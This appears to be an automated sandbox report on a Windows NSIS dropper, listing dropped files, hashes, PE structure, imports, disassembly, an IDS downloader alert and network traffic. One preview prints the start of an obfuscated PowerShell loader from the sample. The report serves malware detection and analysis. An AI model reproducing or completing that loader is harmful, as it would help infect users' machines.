SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	720350
Entropy (8bit):	7.811862008987691
Encrypted:	false
SSDEEP:	12288:IfL/UfibuJsrsG1Zb1kOrRmhx1NMzMRhPstKlQyYefZKSxA340ryKhz:IfL8fibuCwG1Zb1kOrQezyh0tjexKj3v
MD5:	C759322828B728B406066F7D04170334
SHA1:	99A3B91E0BFBA32C4884C6ACC167DA53EBB580DB
SHA-256:	8944DE6CA208C12DC7086AE70FC0375635BEA9AE1B671FB1E54885F8B51B9C87
SHA-512:	4ED1D04BF22508DFA58301A6D3296636ABB6417D2A3BCB4739B89650EABFFF951F29C4D297C8C98CBDC6AAEDBE3294D8619A4216CC921622466C39D5EBBF6467
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................@...k...........................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....k...@...l..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dkrgxlh.zmk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xpfagcd.vir.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsulpt3u.e2g.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bw4cdylp.fbe.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\iwEnYIOol8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	7168
Entropy (8bit):	5.2959870663251625
Encrypted:	false
SSDEEP:	96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
MD5:	B4579BC396ACE8CAFD9E825FF63FE244
SHA1:	32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
SHA-256:	01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
SHA-512:	3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 678763_PDF.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious, Browse Filename: Ze1Ueabtx5.img, Detection: malicious, Browse Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens\storfavoritters.tid

Download File

Process:	C:\Users\user\Desktop\iwEnYIOol8.exe
File Type:	data
Category:	dropped
Size (bytes):	495136
Entropy (8bit):	1.2514913232658866
Encrypted:	false
SSDEEP:	1536:jfLDH9Jx2uiEaWIwEfM+5EUPDohS/uF1bXyCOAqRu:TsIaV+CDTuF1bizAT
MD5:	F28B6FB0CA8AF14D2913C43CBEA08754
SHA1:	0BA129FCFA0131A4EFCDF2B1952F4FAE59604720
SHA-256:	F1C35573809F92DC65D2EB2EBC3CD9D0C78E75E73ED741E52BAECAE2FC02DD70
SHA-512:	523F6E0A8E879F13AB9D7BAE0E7A7E0157ABB0A8B1240F0EC0B5FF84C26A3F1519535DFAD9170BC6E887AE70DE03B939148D629695DB71DC53DF5A75AC2E2757
Malicious:	false
Preview:	...n.............................Y.....................!.......j.........[...............R................+.........M............................................................=..........................................................j....g.......9..........................&....................................s.......................x.......{............-............................................V......................u......................................................................................F.........y..................V.............\.......................`....................]..........e.......1.........6.......M................+...................................S...e..............................................g..........................Z.....26............C...&...............................................-...................................................................)..................................................................................G......

C:\Users\user\AppData\Roaming\erstatningsgraden\adstringe.Tel

Download File

Process:	C:\Users\user\Desktop\iwEnYIOol8.exe
File Type:	data
Category:	dropped
Size (bytes):	316039
Entropy (8bit):	7.699241603329839
Encrypted:	false
SSDEEP:	6144:IsW8mW8GooxhX+7IlB9MO75KFlWB4zyp946gnViPcS+TJIyTDzshejiLknOqTc:dW8kGoox94+sFwBZfkIcS+TJIGueeAOJ
MD5:	FA2402E46BB7DAC084C68260C183323D
SHA1:	DA6F2450E598263317DCA6579528103A3189203F
SHA-256:	C15DB6A55669CC3D18ACA6AEAD8215AED936CFE4BBDA7E9CDE77EB7668A98C17
SHA-512:	97317F63D2EDFB3D0E3F3B1A01B844A795A4B36524868AD0311B1FDCC9E41B8937AA2CBC21426E76E5A128A1560F05ACF6BD67354DFE0799A8B6A4F82DD520A7
Malicious:	false
Preview:	......fff..P......h.````........00.......V..........................___..M...HH.......dddd.................11......................q.Q...]..0.**.......!!.ll.ff.....................:.....L......w......ppppp.............P......+++...TT....___........IIII.........c.E...........llll......Y..........ooooo...........VVVV...fff..............WWWW.................^.....o.....Y....#............bbb........................... .............ff...F.<...........................F..9.....{.c.... ....==.oo...]]...zzzzzz.....EEE................................i....................................................................^................HHH.......:...8888.\|........ooo.......B...------.vv.............SSS.............................0...............................e............""...))............@......Y..............................................ff...:......'.....s...........q..............F..t.......................ee......r.jj...........LLL.oooo...........................{...............MM

C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic

Download File

Process:	C:\Users\user\Desktop\iwEnYIOol8.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4311), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	72517
Entropy (8bit):	5.19670728205198
Encrypted:	false
SSDEEP:	1536:pYWwIbNu/JJosu22ah+VAJFawb6Lid/UBUGCcApxECqO3KLH1:ppwIbNuhmjamM6LiZUBpCdjECqO3IH1
MD5:	84604CBABBC9A011908E6A4DE31BA2FD
SHA1:	34C6D418E6FBB5D19FC018CD9288B518D2D9E2B6
SHA-256:	F0BD63ADC562EE8971BC826C0AFC2B2CEAF333FB6259E44C34640026D2D9B032
SHA-512:	009A28053E2E740D40694E148E0C56D263068C5D069467A79F996779E45F1738D78424260C0658E551107665DEC509C1FC2A581C645B2CF8FFA29A32E064A404
Malicious:	true
Preview:	$Kanonens=$werehare;.....<#Kimmie Shila Lorder Skvulpes Solvarme Banjoerne Ambilateral #>..<#Eleveres Dufoil Metalogic Studieegnethed Unprovincially Heltidsansttes unbanished #>..<#Nephropyeloplasty Nealson Scote Strippere Auktionsdeltagere Grnskollingen #>..<#Regionalsprogs Kloroforms Frysediskes Filestatus aulu Desserttallerkner #>..<#Currently Orkidtren Oplagspladses Sweatshirtenes Udsagn Rustningskaplbs #>..<#supplementvinkel Costner Motiveredes Erindringsbog Alkydmalingers Maksimumsstraffe aftrkkende #>...$Venesector = @'.Fork,en.Gengael$ agforeUPredrilnKuldkaso CystosiTurteldlSemainieSkraaned Mechan=Burlesk$Skam,ydJS.olecov AcquienSlimmeraUncanonlCyulglad Zephyrr Forvale Stentjnmodville Eksple;Flakero.mu.tidifRdgardiuFabiolanSammenkcSamarbet Realkoi SinnaroSvum ednTsub,ko K mmanaJunkierntydeusafFlyulykgplnerunt Arrigse Unsk,inMed.agedJaskeskeBagvask Pelicom(Spiritu$Udtaltep Snou hr Affi.ieChippersF rligssFrowstieHandelsmHabitatd,ackingeAfsnitsr tentorsHitteba,Turnete$El ctroTTi

C:\Users\user\AppData\Roaming\erstatningsgraden\preappearance.glu

Download File

Process:	C:\Users\user\Desktop\iwEnYIOol8.exe
File Type:	data
Category:	dropped
Size (bytes):	408232
Entropy (8bit):	1.259531155482668
Encrypted:	false
SSDEEP:	768:c3mYm00dVSgDT+afxNr3DwNJbiI7MrrtHFmYA3vCiuv/BQanrlhqkroqqL7jCzHs:X00FVwDotSeUpjvxXDpih4YZtc
MD5:	CCE82C77E237537520FBD52B63A51E58
SHA1:	D902CE813446431FFECA35141FCD9825D4DBEF4D
SHA-256:	0F7DCA6879E497104B6813228391DECF7D6270D90FC887F1B9384B5E5B438221
SHA-512:	2F0C0A6FBA09D19D72828589A658FEECD9E0A03F2B8C3DCA046AACFCB887375D538452D59DB24EDB8D17199AC3CA43ED1373262B6206B30F55F00ED159BAFEFE
Malicious:	false
Preview:	.......................................................................................P................0......................................................(.....................................................................................S.............................r..-.................n...................]....................................\|e................`......................{.................................J....................*......J............................]..................................................u..............................................................................................................\........................:...............................................................M..........................................................................................................................l..............l....8...........9............................................................2....=.........................................

C:\Users\user\AppData\Roaming\erstatningsgraden\reaktiv.ove

Download File

Process:	C:\Users\user\Desktop\iwEnYIOol8.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 55
Category:	dropped
Size (bytes):	379198
Entropy (8bit):	1.2531245811733491
Encrypted:	false
SSDEEP:	1536:K2a+g7Qqek5bnEKRY3dJkKoYZrcvYy5oXBfwokPtW:TrvqLJnudnttcvARYtW
MD5:	B4BD98AA231F431FA2C0B32C041971DA
SHA1:	D58868B02A5DEDACC33CE7EB0658201EF5A29766
SHA-256:	E34CA004CCB16A80E49010B584428A08AB3D89FCA778567346D26F84FF892962
SHA-512:	69CD7AF495A1DC3F612B456A2ABB2FE9F6FF556E73DA0707B26325E08AA94138FB094DAA4A35E7C7BCDCE81FDF118A9A4C664632523CEED16765B2E74FCBDD05
Malicious:	false
Preview:	........7....................................................$................................................n.........b...............S...............................................~%..........................................................................K................................................._....w.......*e.......b.'.....M.......].....................................................[.......................................................................u...G.............G.....................................F!.......................w...................................................................................r.....................................................F................>.s.....................................2......E..............g............................................................C.>...............A.........................................................................................................................S..........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.811862008987691
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	iwEnYIOol8.exe
File size:	720'350 bytes
MD5:	c759322828b728b406066f7d04170334
SHA1:	99a3b91e0bfba32c4884c6acc167da53ebb580db
SHA256:	8944de6ca208c12dc7086ae70fc0375635bea9ae1b671fb1e54885f8b51b9c87
SHA512:	4ed1d04bf22508dfa58301a6d3296636abb6417d2a3bcb4739b89650eabfff951f29c4d297c8c98cbdc6aaedbe3294d8619a4216cc921622466c39d5ebbf6467
SSDEEP:	12288:IfL/UfibuJsrsG1Zb1kOrRmhx1NMzMRhPstKlQyYefZKSxA340ryKhz:IfL8fibuCwG1Zb1kOrQezyh0tjexKj3v
TLSH:	B7E412D07D919096EDB5B872F9BA0D5017932C2A23DA231F237873691993653A34FB0F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

File Icon


Icon Hash:	539b8caeaee66c11

Static PE Info

General

Entrypoint:	0x403532
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F3BDD0382EAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F3BDD0382B8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [004347B8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x16bf0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x68d8	0x6a00	742185983fa6320c910f81782213e56f	False	0.6695165094339622	data	6.478461709868021	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1464	0x1600	a995b118b38426885fc6ccaa984c8b7a	False	0.4314630681818182	data	4.969091535632612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2a818	0x600	9a9bf385a30f1656fc362172b16d9268	False	0.5247395833333334	data	4.172601271908501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x1f000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x54000	0x16bf0	0x16c00	4361f60a54e8593e396ed02385fb8e51	False	0.43695269574175827	data	5.337867037994319	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x54328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.3725452502070271
RT_ICON	0x64b50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5725103734439834
RT_ICON	0x670f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.676829268292683
RT_ICON	0x681a0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6172707889125799
RT_ICON	0x69048	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7436823104693141
RT_ICON	0x698f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5361271676300579
RT_ICON	0x69e58	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.849290780141844
RT_DIALOG	0x6a2c0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6a3c0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6a4e0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6a5a8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6a608	0x68	data	English	United States	0.7211538461538461
RT_VERSION	0x6a670	0x240	data	English	United States	0.5364583333333334
RT_MANIFEST	0x6a8b0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T05:00:58.164778+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49970	172.217.16.142	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:00:57.101543903 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:57.101579905 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:57.101636887 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:57.112971067 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:57.112986088 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:57.767486095 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:57.767669916 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:57.768570900 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:57.768624067 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:57.863632917 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:57.863657951 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:57.864083052 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:57.864130020 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:57.867378950 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:57.911326885 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:58.164773941 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:58.164838076 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:58.164849997 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:58.164890051 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:58.165024996 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:58.165059090 CET	443	49970	172.217.16.142	192.168.2.7
Jan 11, 2025 05:00:58.165102959 CET	49970	443	192.168.2.7	172.217.16.142
Jan 11, 2025 05:00:58.212598085 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:00:58.212644100 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:00:58.213099003 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:00:58.213099003 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:00:58.213138103 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:00:58.850625992 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:00:58.850980043 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:00:59.195760965 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:00:59.195822954 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:00:59.197314978 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:00:59.197455883 CET	49971	443	192.168.2.7	216.58.206.33
